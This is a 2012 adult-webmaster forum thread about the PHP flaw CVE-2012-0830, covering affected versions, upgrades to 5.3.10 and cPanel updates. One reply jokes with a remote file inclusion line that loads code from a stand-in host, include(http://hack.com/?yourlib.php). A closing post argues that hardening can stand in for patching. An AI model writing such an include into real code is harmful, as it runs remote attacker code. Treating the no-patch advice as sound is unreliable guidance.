GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Critical vulnerability identified in PHP (https://gfy.com/showthread.php?t=1056208)

MrGusMuller 02-04-2012 03:31 AM
Critical vulnerability identified in PHP
 
Quote:
A critical vulnerability in the most recent release of PHP has just been found (CVE-2012-0830). This exploit could allow arbitrary code to be remotely executed on a PHP system. This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.
in Zend Server Update Email

https://bugzilla.redhat.com/show_bug.cgi?id=786686
http://thexploit.com/sec/critical-ph...collision-dos/

You all should update to the PHP 5.3.10.

raymor 02-04-2012 03:52 AM
Thanks. Of course PHP itself is a arbitrary code execution vulnerability. include(http://hack.com/?yourlib.php) anyone?

Klen 02-04-2012 06:44 AM
I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?

fris 02-04-2012 06:46 AM
Quote:
Originally Posted by KlenTelaris (Post 18734687)
I cant update to 5.3,it's too different to ver 5.2.Any fix for version 5.2 ?
im pretty sure it only effects 5.3.x

Fletch XXX 02-04-2012 06:46 AM
thanks for posting.

DamageX 02-04-2012 06:58 AM
Quote:
Originally Posted by fris (Post 18734690)
im pretty sure it only effects 5.3.x
Quote:
This vulnerability is present both on PHP 5.3.9, and on PHP 5.2.17 that contains a backported fix for CVE-2011-4885.
Looks like it does affect at least one version of 5.2.x

fris 02-04-2012 07:33 AM
oh snap time to upgrade then

fris 02-04-2012 12:43 PM
just finished my upgrade

Quote:
PHP 5.3.10 with Suhosin-Patch (cli) (built: Feb 4 2012 06:50:45)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2012 Zend Technologies
with the ionCube PHP Loader v4.0.12, Copyright (c) 2002-2011, by ionCube Ltd

LiveDose 02-04-2012 03:53 PM
Bump. Thanks.

MrGusMuller 02-07-2012 05:05 AM
For those with CPanel...
EasyApache 3.8.6 is now available; in this build PHP 5.3.10 replaces 5.3.9.
The change log is available here: http://docs.cpanel.net/twiki/bin/vie...syApache#3.8.6

seeandsee 02-07-2012 05:34 AM
Fucking vulnerability holes, is there some super protected coding to work with...

Klen 02-07-2012 06:36 AM
But still question is will it fuck up some scripts if i do update....

Operator 02-07-2012 06:40 AM
Php 5.1.6 :)

6South 02-07-2012 06:41 AM
PHP is a risk no matter what version you upgrade to and installing the latest, greatest build of PHP is almost guaranteed to break at least one of your apps.

As usual, this type of vulnerability can be protected against without constant upgrading by simply managing your PHP configuration and responsible administration / monitoring of your servers.

Suhosin, responsible PHP settings, active protection (mod_security) and a decent malware / exploit scanner will serve you much better than trying to keep up with the patches. For every published exploit there's at least a dozen others out there at any given time.


All times are GMT -7. The time now is 03:15 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc